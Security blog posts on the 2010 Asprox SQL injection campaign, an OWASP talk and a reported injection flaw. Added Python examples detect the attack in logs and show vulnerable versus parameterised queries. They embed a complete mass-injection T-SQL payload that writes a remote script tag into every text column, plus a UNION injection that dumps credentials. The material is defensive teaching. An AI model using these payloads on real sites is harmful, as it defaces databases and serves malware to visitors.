
Wednesday, June 30, 2010

From Russia with love - asprox

Tonight I found in my RSS reader that a large number of websites (some very popular ones in Belgium) are infected with ru/js.js.

It appears that this comes from a trojan called Asprox. Originally it spread through spam sent via the Pushdo botnet, but the attack vector seems to have changed.

The new attack vector is SQL injection. Rondel Mendez wrote an excellent piece about it for M86 Security that explains what the malware does.

The injection walks the Microsoft SQL Server system tables, so it only works against sites with an MSSQL backend. The syscolumns xtype values it abuses are 35 (text), 99 (ntext), 167 (varchar) and 231 (nvarchar, which sysname shares). All of these can hold a string, and the string it writes into every such column is a script tag pointing at the botnet's URL.
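To make the mechanics concrete, here is an added example (my own, not code from the post or from the M86 write-up) that decodes a payload of this style out of a web-server access log and flags the traits described above: the walk over syscolumns filtered on those four xtype values, and the <script src=...> appended to every string column. It assumes the delivery form this campaign is widely reported to have used, the T-SQL hex-encoded inside CAST(0x... AS VARCHAR(4000)) in a query-string parameter; the log lines, the script URL and the payload text are constructed for the example.

```python
"""Decode and flag Asprox-style SQL injection payloads in access-log lines.

Added example, not code from the original post or the M86 write-up. Assumes
the payload arrives hex-encoded inside CAST(0x... AS VARCHAR) in a query
string. All sample data below is constructed.
"""
import re
import urllib.parse

# syscolumns xtype values the injection filters on (from the post);
# 231 is nvarchar, which sysname is built on.
TARGET_XTYPES = {35: "text", 99: "ntext", 167: "varchar", 231: "nvarchar/sysname"}

CAST_HEX_RE = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?VARCHAR", re.I)
XTYPE_RE = re.compile(r"\bxtype\s*=\s*(\d+)", re.I)
SCRIPT_RE = re.compile(r"<script\s+src=([^>\s'\"]+)", re.I)
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)')


def decode_hex_casts(query_string):
    """Return the decoded body of every CAST(0x... AS VARCHAR) in a URL-encoded query string."""
    sql_text = urllib.parse.unquote_plus(query_string)
    payloads = []
    for hexstr in CAST_HEX_RE.findall(sql_text):
        try:
            payloads.append(bytes.fromhex(hexstr).decode("latin-1"))
        except ValueError:
            continue  # odd-length or otherwise undecodable hex: not a real payload
    return payloads


def analyse_request(log_line):
    """Summarise what a hex-encoded payload in one access-log line would do."""
    m = REQUEST_RE.search(log_line)
    target = m.group(1) if m else log_line
    query = target.partition("?")[2]
    verdict = {"hex_cast": False, "walks_syscolumns": False,
               "xtypes": [], "script_urls": []}
    for sql in decode_hex_casts(query):
        verdict["hex_cast"] = True
        if re.search(r"\bsyscolumns\b", sql, re.I):
            verdict["walks_syscolumns"] = True
        found = {int(x) for x in XTYPE_RE.findall(sql)}
        verdict["xtypes"] = sorted(found & set(TARGET_XTYPES))
        verdict["script_urls"] = SCRIPT_RE.findall(sql)
    verdict["asprox_like"] = (verdict["hex_cast"] and verdict["walks_syscolumns"]
                              and bool(verdict["xtypes"]) and bool(verdict["script_urls"]))
    return verdict


# Constructed payload in the cursor-over-syscolumns style the post describes;
# the script URL is invented (example.invalid is reserved and never resolves).
SAMPLE_SQL = (
    "DECLARE @T varchar(255),@C varchar(255) "
    "DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b "
    "where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) "
    "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C "
    "WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))"
    "+''<script src=http://example.invalid/ru/js.js></script>''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)

_injected_param = ("1;DECLARE @S VARCHAR(4000);SET @S=CAST(0x%s AS VARCHAR(4000));EXEC(@S);--"
                   % SAMPLE_SQL.encode("latin-1").hex())

# Constructed access-log lines: one injection attempt and one normal request.
SAMPLE_LOGS = [
    '203.0.113.5 - - [30/Jun/2010:23:10:02 +0200] "GET /news.asp?id=%s HTTP/1.1" 200 5123'
    % urllib.parse.quote_plus(_injected_param),
    '198.51.100.7 - - [30/Jun/2010:23:10:05 +0200] "GET /news.asp?id=42 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for line in SAMPLE_LOGS:
        print(analyse_request(line))
```

Running it over the two constructed lines flags the first as asprox_like with all four xtype values and the decoded script URL, and leaves the plain request clean. The decode step is the part worth keeping: a signature on the literal string "syscolumns" never fires on the wire, because the sensor only sees hex.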

How to solve this? Simple: fix your code. Never trust user input; normalise it, check that the values are acceptable, and hand them to the database as bound parameters instead of concatenating them into the query string.
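As an added example, not from the post: the vulnerable pattern the infected sites shared, beside the fix, using an in-memory SQLite database with invented table names and sample data. Stacked statements (a trailing UPDATE after the original query, which is what Asprox used against SQL Server) are refused by Python's sqlite3 driver, so the demonstration uses a UNION ALL that reads another table through the same hole; the hardening is identical either way.

```python
"""Vulnerable string-built query beside its validated, parameterised replacement.

Added example, not code from the original post. Table names and data are
invented; the database is an in-memory SQLite instance.
"""
import sqlite3


def make_db():
    """Constructed sample schema: a public articles table and a private users table."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE articles (id INTEGER PRIMARY KEY, body TEXT);
        CREATE TABLE users (login TEXT, password TEXT, server TEXT);
        INSERT INTO articles VALUES (1, 'Hello world');
        INSERT INTO users VALUES ('admin', 's3cret', 'db01');
    """)
    return con


def article_vulnerable(con, article_id):
    """What the injected sites did: the request parameter is pasted into the SQL text."""
    sql = "SELECT body FROM articles WHERE id = " + str(article_id)
    return [row[0] for row in con.execute(sql)]


def parse_article_id(raw):
    """Normalise and check the value before it goes anywhere near the database."""
    value = str(raw).strip()
    if not value.isdigit() or len(value) > 9:
        raise ValueError("article id must be a positive integer, got %r" % raw)
    return int(value)


def article_safe(con, raw_id):
    """Validate first, then let the driver bind the value as a parameter."""
    article_id = parse_article_id(raw_id)
    rows = con.execute("SELECT body FROM articles WHERE id = ?", (article_id,))
    return [row[0] for row in rows]


# Constructed attacker input: a valid id followed by a UNION that reads the users table.
INJECTION = "1 UNION ALL SELECT login || ':' || password || '@' || server FROM users"

if __name__ == "__main__":
    con = make_db()
    print("vulnerable:", article_vulnerable(con, INJECTION))
    try:
        article_safe(con, INJECTION)
    except ValueError as exc:
        print("safe:", exc)
```

The validation step is what the post means by "normalize it and check if the values are acceptable"; the bound parameter is what makes the query itself immune even if a check is forgotten elsewhere. Both belong in the fix.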

Thursday, June 17, 2010

Meet Joe McCray

Yesterday there was a last-minute OWASP chapter meeting with two presentations by Joe McCray of learnsecurityonline.com. The intro was great: Joe loves hacking, swearing and drinking rum and coke (a.k.a. Cuba Libre).

The first presentation was about SQL injection. Most of what Joe talked about were things I already knew, but it is always interesting to hear somebody explain how he or she does it, and yes, I learned new things. I have been to presentations where a VM with a vulnerable web app had been prepared, but not Joe: he did his demo on a live website and enumerated all databases on the web server. He explained in great detail what kinds of injection there are, and the conclusion was "Fix your shit". He demonstrated how an IDS can help you but is not a silver bullet.

The most important thing I took home from this presentation is his experience that not everybody terminates SSL connections, normalises the input and then feeds it to the IDS ... and of course "Fix your shit" :). At the end of the evening we discussed the easiest way to get the stuff fixed, and his experience was to get vulnerabilities classified as bugs by the Quality Assurance people. I think this is a trick I will apply in the future :)


The second presentation was about web application firewalls. I have no experience with application firewalls. I saw some presentations in the past, and Joe confirmed what I was thinking: it is something that buys you some time to "fix your shit", but not the solution.

Joe is coming to BruCon in September 2010 to give a session titled "You Spent All That Money And You Still Got Owned".

Wednesday, October 22, 2008

Doing some research

Howdy,



It has been a while since my last post, but I have been busy. I've found a SQL injection vulnerability in a product and I am researching it. It is quite a major problem: when you inject into it, it returns login, password and server.

I will post more details later but now I have to contact the vendor.